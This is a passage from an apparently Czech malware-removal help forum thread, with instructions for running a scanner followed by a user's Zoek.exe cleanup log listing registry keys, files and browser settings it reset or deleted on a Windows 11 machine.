(posuvník dolu na download)
a ulož si ho na plochu.
Poklepej na tento soubor na ploše a postupuj podle pokynů k instalaci programu.
Přijmi licenci k používání programu EULA , pokud se nabídne.
Pokud je k dispozici aktualizace programu , klepni na tlačítko „Update now“ ( aktualizovat nyní).
Zavři všechny otevřené soubory, složky a prohlížeče
Neměň žádné nastavení. Klikni na „Skenovat nyní“.
Po skenu lze vidět , zda jsou nějaké nákazy. Klikni na „Vykonat“ ( vymazat). Nákazy budou přemístěny do karantény.
Když je skenování dokončeno, klikni vlevo na „zprávy“ a pak na „otevři zprávu“ a zkopíruj sem celý obsah té zprávy.

Vlož nový log z HJT + informuj o problémech

[autoprd]

Zoek.exe v5.0.0.2 Updated 03-May-2018(Online Version)
Tool run by Woytman on 08.11.2022 at 21:00:21,33.
Microsoft Windows 11 Home 10.0.22000 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Woytman\Desktop\zoek (1).exe [Scan current user] [Script inserted]

==== Older Logs ======================

C:\zoek-results2022-11-08-193707.log 1873 bytes

==== Reset Hosts File ======================

# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
::1 localhost

==== Empty Folders Check ======================

C:\Users\Woytman\AppData\Local\DBG deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{001CBD50-B04C-4E64-8B9A-BE23B46CECC9} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{01A5E2C4-740A-40A4-93D2-8F4A1C1A7C04} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0290EBEE-E1F3-48F0-8D12-9061610DED3D} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1BD5FC40-D61C-47A1-A682-F2047C8A8136} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F2A1B40-F68A-4179-A528-CEFF4E43A969} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4BB52B00-BCCF-4814-9281-96A2757366C0} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4E4BEF9D-F2C2-406F-96A1-48ACAE8E3FC8} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{51FC9773-C140-4D4E-BD71-8D784A25AD7E} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{695DB471-54D4-4DD7-9676-4944254A4AFB} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{88A8F1C5-096A-4D1F-98BF-65B40E8B3CFF} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9410D093-79B2-4ABD-84FD-B3EA740A90BD} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B636FA21-1A69-45FB-B76B-430FA5D2CDE8} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CE52AE49-0D28-42F8-A417-66AB5E5AC805} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D7026CA1-5680-49B0-A702-A110AD0508FC} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{EE4BC132-6FCC-4E07-8E8A-E2D0E9162F6A} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F1801D58-9E26-415F-93B4-27E718781CE1} deleted successfully

==== Deleting CLSID Registry Values ======================


==== Deleting Services ======================


==== Deleting Files \ Folders ======================

C:\Users\Woytman\AppData\Roaming\.tlauncher deleted
C:\Users\Woytman\AppData\Roaming\qBittorrent deleted
C:\Users\Woytman\AppData\Roaming\uTorrent deleted
C:\windows\SysNative\Tasks\Dragon_Center_updater deleted
C:\PROGRA~3\fontcacheev1.dat deleted
C:\PROGRA~3\Package Cache deleted
C:\windows\SysNative\GroupPolicy\User deleted
"C:\DumpStack.log.tmp" not deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\DXGIODScreenshot.dll" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\Lightshot.dll" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\Lightshot.exe" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\uploader.dll" deleted
"C:\PROGRA~2\Skillbrains" deleted
"C:\PROGRA~2\Skillbrains\lightshot" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7" deleted

==== Orphaned Tasks deleted from Registry ======================

Dragon_Center_updater deleted

==== Chromium Look ======================


Just Black - Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aghfnjkcakhmadgdomlmlhhaocbkloab
Malwarebytes Browser Guard - Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ihcjicgdanjaechkgeegckofjjedodee
Dark Reader - Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ifoakfbpdcdoeenechcleahebpibofpc

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.msn.com/"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.msn.com/"

==== All HKLM and HKCU SearchScopes ======================

HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKCU\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - http://www.google.com/search?q={searchTerms}
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR

==== Reset Google Chrome ======================

C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Guest Profile\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Guest Profile\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Secure Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Secure Preferences.bak was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data will be reset at reboot
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data-journal will be reset at reboot
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Web Data was reset successfully
C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile\Web Data was reset successfully
C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Web Data was reset successfully

==== Empty IE Cache ======================

C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Woytman\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Woytman\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully

==== Empty FireFox Cache ======================

No FireFox Profiles found

==== Empty Edge Cache ======================

Edge Cache Emptied Successfully

==== Empty Chrome Cache ======================

C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Cache emptied successfully

==== Empty All Flash Cache ======================

No Flash Cache Found

==== Empty All Java Cache ======================

No Java Cache Found

==== C:\zoek_backup content ======================

C:\zoek_backup (files=865 folders=105 2167374357 bytes)

==== Empty Temp Folders ======================

C:\Users\Woytman\AppData\Local\Temp will be emptied at reboot
C:\WINDOWS\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\WINDOWS\Temp successfully emptied
C:\Users\Woytman\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== Deleting Files / Folders ======================

"C:\DumpStack.log.tmp" not deleted
"C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data" not found
"C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Web Data-journal" not found

==== EOF on 08.11.2022 at 21:29:59,15 ======================